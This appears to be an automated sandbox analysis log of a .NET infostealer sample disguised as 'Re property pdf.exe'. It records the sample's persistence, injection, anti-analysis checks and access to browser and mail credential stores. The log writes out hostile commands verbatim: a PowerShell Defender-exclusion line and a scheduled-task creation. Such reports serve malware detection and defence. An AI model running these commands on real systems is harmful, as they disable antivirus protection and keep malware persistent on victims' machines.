            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe; Mutant created: NULL
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe; Mutant created: \Sessions\1\BaseNamedObjects\GZdhCKjbNSalCbZtEh
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
            Source: C:\Users\user\Desktop\Re property pdf.exe; File created: C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp
            Source: Re property pdf.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Re property pdf.exe; File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Re property pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4211371395.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Re property pdf.exe; ReversingLabs: Detection: 91%
            Source: C:\Users\user\Desktop\Re property pdf.exe; File read: C:\Users\user\Desktop\Re property pdf.exe
            Source: unknown; Process created: C:\Users\user\Desktop\Re property pdf.exe "C:\Users\user\Desktop\Re property pdf.exe"
            Source: C:\Users\user\Desktop\Re property pdf.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Re property pdf.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Re property pdf.exe; Process created: C:\Users\user\Desktop\Re property pdf.exe "C:\Users\user\Desktop\Re property pdf.exe"
            Source: unknown; Process created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe; Process created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe; Process created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe; Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
            Source: C:\Windows\SysWOW64\PresentationHost.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Re property pdf.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\PresentationHost.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Re property pdf.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Re property pdf.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: PresentationHost.pdbGCTL source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uGMCFMVqKoR.exe, 00000010.00000002.4211703538.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Re property pdf.exe, Re property pdf.exe, 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationHost.pdb source: uGMCFMVqKoR.exe, 00000010.00000003.2118973099.0000000000A3B000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.Re property pdf.exe.8c00000.3.raw.unpack, ntkhga1giMCKkUj49f.cs, .Net Code: oJG6iAV4YZ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Re property pdf.exe.3f1ee10.0.raw.unpack, ntkhga1giMCKkUj49f.cs, .Net Code: oJG6iAV4YZ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Re property pdf.exe.3fa6c30.1.raw.unpack, ntkhga1giMCKkUj49f.cs, .Net Code: oJG6iAV4YZ System.Reflection.Assembly.Load(byte[])
            Source: Re property pdf.exe, Static PE information: section name: .text entropy: 7.86751234729538
            Source: hwOHPmqcegxcxb.exe.0.dr, Static PE information: section name: .text entropy: 7.86751234729538
            Source: C:\Users\user\Desktop\Re property pdf.exeFile created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeJump to dropped file

            Boot Survival

            Source: C:\Users\user\Desktop\Re property pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Re property pdf.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: Re property pdf.exe PID: 7480, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: hwOHPmqcegxcxb.exe PID: 7852, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\Re property pdf.exe Memory allocated: 1300000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Re property pdf.exe Memory allocated: 2CE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Re property pdf.exe Memory allocated: 1370000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Re property pdf.exe Memory allocated: 8DA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Re property pdf.exe Memory allocated: 9DA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Re property pdf.exe Memory allocated: 9FA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Re property pdf.exe Memory allocated: AFA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Memory allocated: 11D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Memory allocated: 2D40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Memory allocated: 4E40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Memory allocated: 8A60000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Memory allocated: 9A60000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Memory allocated: 9C50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Memory allocated: AC50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_0104096E rdtsc 6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6024
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 711
            Source: C:\Windows\SysWOW64\PresentationHost.exe Window / User API: threadDelayed 6628
            Source: C:\Windows\SysWOW64\PresentationHost.exe Window / User API: threadDelayed 3345
            Source: C:\Users\user\Desktop\Re property pdf.exe API coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe API coverage: 0.2 %
            Source: C:\Users\user\Desktop\Re property pdf.exe TID: 7500 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe TID: 7872 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404 Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404 Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664 Thread sleep count: 6628 > 30
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664 Thread sleep time: -13256000s >= -30000s
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664 Thread sleep count: 3345 > 30
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664 Thread sleep time: -6690000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Re property pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
            Source: C:\Users\user\Desktop\Re property pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
            Source: C:\Users\user\Desktop\Re property pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
            Source: C:\Users\user\Desktop\Re property pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
            Source: C:\Users\user\Desktop\Re property pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
            Source: C:\Users\user\Desktop\Re property pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX&~r
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4211554273.0000000000AC0000.00000004.00000001.00020000.00000000.sdmp, firefox.exe, 00000012.00000002.2451257091.000002C70C51C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Re property pdf.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Re property pdf.exe Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\PresentationHost.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\Re property pdf.exe Code function: 6_2_00417483 LdrLoadDll, 6_2_00417483
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103656A mov eax, dword ptr fs:[00000030h]6_2_0103656A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01002582 mov eax, dword ptr fs:[00000030h]6_2_01002582
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01002582 mov ecx, dword ptr fs:[00000030h]6_2_01002582
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01034588 mov eax, dword ptr fs:[00000030h]6_2_01034588
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E59C mov eax, dword ptr fs:[00000030h]6_2_0103E59C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF645D mov eax, dword ptr fs:[00000030h]6_2_00FF645D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010805A7 mov eax, dword ptr fs:[00000030h]6_2_010805A7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010805A7 mov eax, dword ptr fs:[00000030h]6_2_010805A7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010805A7 mov eax, dword ptr fs:[00000030h]6_2_010805A7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010245B1 mov eax, dword ptr fs:[00000030h]6_2_010245B1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010245B1 mov eax, dword ptr fs:[00000030h]6_2_010245B1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E5CF mov eax, dword ptr fs:[00000030h]6_2_0103E5CF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E5CF mov eax, dword ptr fs:[00000030h]6_2_0103E5CF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010065D0 mov eax, dword ptr fs:[00000030h]6_2_010065D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A5D0 mov eax, dword ptr fs:[00000030h]6_2_0103A5D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A5D0 mov eax, dword ptr fs:[00000030h]6_2_0103A5D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFC427 mov eax, dword ptr fs:[00000030h]6_2_00FFC427
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE420 mov eax, dword ptr fs:[00000030h]6_2_00FFE420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE420 mov eax, dword ptr fs:[00000030h]6_2_00FFE420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE420 mov eax, dword ptr fs:[00000030h]6_2_00FFE420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010025E0 mov eax, dword ptr fs:[00000030h]6_2_010025E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C5ED mov eax, dword ptr fs:[00000030h]6_2_0103C5ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C5ED mov eax, dword ptr fs:[00000030h]6_2_0103C5ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038402 mov eax, dword ptr fs:[00000030h]6_2_01038402
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038402 mov eax, dword ptr fs:[00000030h]6_2_01038402
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038402 mov eax, dword ptr fs:[00000030h]6_2_01038402
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
